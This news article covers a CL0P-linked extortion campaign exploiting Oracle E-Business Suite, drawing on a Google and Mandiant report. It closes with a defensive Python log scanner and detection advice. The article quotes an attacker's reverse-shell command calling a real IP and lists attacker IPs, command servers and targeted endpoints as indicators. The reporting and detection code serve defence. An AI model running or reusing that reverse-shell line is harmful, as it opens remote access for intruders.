Google reports 'mass amounts of customer data' exploited in extortion campaign

Source Cryptopolitan

Google has reported a large-scale extraction of customer data by bad actors, who it claimed are involved in an extortion scheme. Google Threat Intelligence and Mandiant tracked the exploitation operation to attackers that might be associated with the CL0P extortion group.

Google’s Threat Intelligence Group (GTIG) and Mandiant have brought to light an extensive extortion campaign that exploits vulnerabilities in Oracle’s E-Business Suite (EBS). The campaign has resulted in the theft of large volumes of customer data. They said the operation began on September 29, 2025 and involved a group claiming ties to the CL0P extortion brand.

Google and Mandiant reveal zero-day exploitation 

According to Google’s report, the attackers sent a “high volume” of emails to executives across multiple organizations, alleging breaches of their Oracle EBS environments and threatening to publish stolen data unless a ransom was paid. 

The emails, sent from hundreds of compromised third-party accounts, included contact addresses, support@pubstorm.com and support@pubstorm.net, previously linked to the CL0P data leak site.

Google and Mandiant’s joint investigation found that the exploitation activity dates back to as early as July 2025, possibly linked to a zero-day vulnerability now tracked as CVE-2025-61882. In some cases, the attackers reportedly exfiltrated “a significant amount of data” from affected organizations.

Oracle stated that the exploited flaws had been fixed in July, but later issued emergency updates on October 4 to address additional vulnerabilities. Oracle told its customers to use the latest critical patch updates and stressed that staying current on all patches is essential to prevent compromise.

The CL0P extortion brand has been active since 2020 and is historically tied to the FIN11 cybercrime group. It has previously targeted managed file transfer systems like MOVEit, GoAnywhere, and Accellion FTA. Those campaigns followed a similar pattern of the mass exploitation of zero-day vulnerabilities, theft of sensitive data, and extortion weeks later. 

At the time of the report, no new victims from this incident had appeared on CL0P’s data leak site. 

Complex, multi-stage Java implants

Google and Mandiant’s technical breakdown reveals that the attackers used multiple exploit chains targeting Oracle EBS components, including UiServlet and SyncServlet, to achieve remote code execution and plant multi-stage Java implants.

In July 2025, suspicious activity involving HTTP requests to /OA_HTML/configurator/UiServlet was observed. The same activity matched an exploit that later surfaced in a Telegram group named “SCATTERED LAPSUS$ HUNTERS.”

The leaked exploit chained several techniques to gain control of targeted servers: a server-side request forgery (SSRF), an authentication bypass, and an XSL template injection.

By August 2025, the attackers began abusing another EBS component, SyncServlet, to create and execute malicious templates inside the EBS database. These templates contained Base64-encoded XSL payloads that loaded Java-based malware directly into memory.

Among the identified implants were GOLDVEIN.JAVA, a downloader that retrieved second-stage payloads from attacker-controlled command servers, and a multi-layered chain dubbed SAGE, which installed persistent Java servlet filters for further exploitation.

After breaching the system, the attackers used the EBS account “applmgr” to perform reconnaissance, collect network and system details, and then install additional malicious files. They also ran shell commands such as ip addr, netstat -an, and bash -i >& /dev/tcp/200.107.207.26/53 0>&1.

The IP addresses 200.107.207.26 and 161.97.99.49 were identified in exploitation attempts, while 162.55.17.215:443 and 104.194.11.200:443 were listed as command-and-control servers for the GOLDVEIN.JAVA payload.

GTIG has not formally linked the operation to any known group, but the campaign shares similarities with FIN11, which is a financially motivated cybercrime group that was previously associated with CL0P ransomware and large-scale data theft operations. 

Mandiant also noted that one of the compromised accounts used to send the extortion emails had been used in earlier FIN11-related attacks.

Defenders are urged to inspect the EBS database tables XDO_TEMPLATES_B and XDO_LOBS for suspicious entries, especially templates with names beginning with “TMP” or “DEF”, and to block outbound internet traffic from EBS servers to prevent further data extortion.

The two organizations also recommend closely monitoring HTTP requests to endpoints such as /OA_HTML/SyncServlet and /OA_HTML/configurator/UiServlet, and analyzing memory dumps for evidence of in-memory Java payloads.
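As an added illustration (not code from Google's or Mandiant's report), the following Python script applies the monitoring advice above to web server access log lines in Common Log Format: it flags requests to the two endpoints named in the report and requests from the two IP addresses the article lists as seen in exploitation attempts. The log lines, function names and the `reasons` labels are constructed for this example.

```python
import re

# Endpoints named in the GTIG/Mandiant guidance and the two IPs the article
# lists in exploitation attempts. Extend both from your own threat intel.
SUSPECT_PATHS = ("/OA_HTML/SyncServlet", "/OA_HTML/configurator/UiServlet")
REPORTED_IPS = {"200.107.207.26", "161.97.99.49"}

# Common Log Format: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def parse_line(line):
    """Parse one access-log line; return a dict of fields or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Return the reasons a request deserves review (empty list if none)."""
    reasons = []
    path = entry["path"].split("?", 1)[0]  # ignore query string when matching
    if path in SUSPECT_PATHS:
        reasons.append("report_endpoint")
        if entry["method"] == "POST":  # template upload/execution is a POST
            reasons.append("post_to_endpoint")
    if entry["ip"] in REPORTED_IPS:
        reasons.append("reported_ip")
    return reasons

def scan(lines):
    """Return (ip, method, path, reasons) for every flagged log line."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # skip lines that are not CLF
        reasons = classify(entry)
        if reasons:
            hits.append((entry["ip"], entry["method"], entry["path"], reasons))
    return hits

# Constructed sample log, not taken from any real incident.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Oct/2025:10:01:02 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5120
200.107.207.26 - - [07/Oct/2025:10:01:09 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 311
203.0.113.9 - - [07/Oct/2025:10:02:15 +0000] "GET /OA_HTML/configurator/UiServlet?x=1 HTTP/1.1" 200 88
10.0.0.7 - - [07/Oct/2025:10:03:44 +0000] "GET /OA_HTML/RF.jsp HTTP/1.1" 200 2048
""".splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit on these endpoints is not proof of compromise by itself; correlate it with the XDO_TEMPLATES_B and XDO_LOBS review and with memory analysis before escalating.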

Google warned that CL0P-linked groups will almost certainly continue to dedicate their resources to acquiring zero-day exploits.
